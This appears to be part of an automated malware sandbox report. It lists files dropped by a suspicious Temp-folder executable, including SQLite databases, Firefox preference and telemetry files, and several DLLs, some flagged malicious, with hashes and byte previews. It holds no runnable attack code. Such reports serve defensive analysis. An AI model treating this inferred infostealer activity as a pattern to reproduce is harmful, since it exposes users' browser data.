                                                                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):9930
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.52954786207792
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:qnaRtZYbBp6xhj4qyaaX86KakfGNBw8dISl:dejquOcwV0
                                                                                                                                                                                                                                                                                                            MD5:F4A553391E41A08B2BB4C5753190D98B
                                                                                                                                                                                                                                                                                                            SHA1:43E3CB6402336FF6E548DC0EA19994BAD2D2E1EA
                                                                                                                                                                                                                                                                                                            SHA-256:B89D8216AF0A845D75F569525ABF37D05416601832194C24122F53BC6D45C81B
                                                                                                                                                                                                                                                                                                            SHA-512:CE49C58E681BF95271C527D1EE26D9C51D127E7B0981EA507CD68620BBABB228D71E5FF9F9FE1AA1D0B3B238422C71796A1952548F34B636CE656099CC3747B4
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):7813
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.176742577398086
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:FjMi3D0cbhbVbTbfbRbObtbyEl7nwrGJA6WnSrDtTUd/SkDrw:FYRcNhnzFSJQrFBnSrDhUd/G
                                                                                                                                                                                                                                                                                                            MD5:FA5F97A72DA483751F47E10F8CAD75C7
                                                                                                                                                                                                                                                                                                            SHA1:45B91A55ADBF15304FFDF6749A74AA18971996F0
                                                                                                                                                                                                                                                                                                            SHA-256:9C35E55F7A178DE4349E456754BD07B08525518AD9987A46CED80FBC03B162A0
                                                                                                                                                                                                                                                                                                            SHA-512:FC859F3A519428E7AF22F93D4A54F82047B086A4DAC923093B13A92879DE636406CD6B7F1681397B60D2836530ECAB41D605ABA0E162BDD283F0160B040BDC30
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"type":"uninstall","id":"cbaa0d80-b915-4a8b-8ad6-7a5f2c16f6cd","creationDate":"2024-11-21T12:14:22.465Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"65e71c9e-6ac3-4903-9066-b134350de32c","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):7813
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.176742577398086
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:192:FjMi3D0cbhbVbTbfbRbObtbyEl7nwrGJA6WnSrDtTUd/SkDrw:FYRcNhnzFSJQrFBnSrDhUd/G
                                                                                                                                                                                                                                                                                                            MD5:FA5F97A72DA483751F47E10F8CAD75C7
                                                                                                                                                                                                                                                                                                            SHA1:45B91A55ADBF15304FFDF6749A74AA18971996F0
                                                                                                                                                                                                                                                                                                            SHA-256:9C35E55F7A178DE4349E456754BD07B08525518AD9987A46CED80FBC03B162A0
                                                                                                                                                                                                                                                                                                            SHA-512:FC859F3A519428E7AF22F93D4A54F82047B086A4DAC923093B13A92879DE636406CD6B7F1681397B60D2836530ECAB41D605ABA0E162BDD283F0160B040BDC30
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"type":"uninstall","id":"cbaa0d80-b915-4a8b-8ad6-7a5f2c16f6cd","creationDate":"2024-11-21T12:14:22.465Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"65e71c9e-6ac3-4903-9066-b134350de32c","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe
                                                                                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1787
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.383500637803967
                                                                                                                                                                                                                                                                                                            Encrypted:false
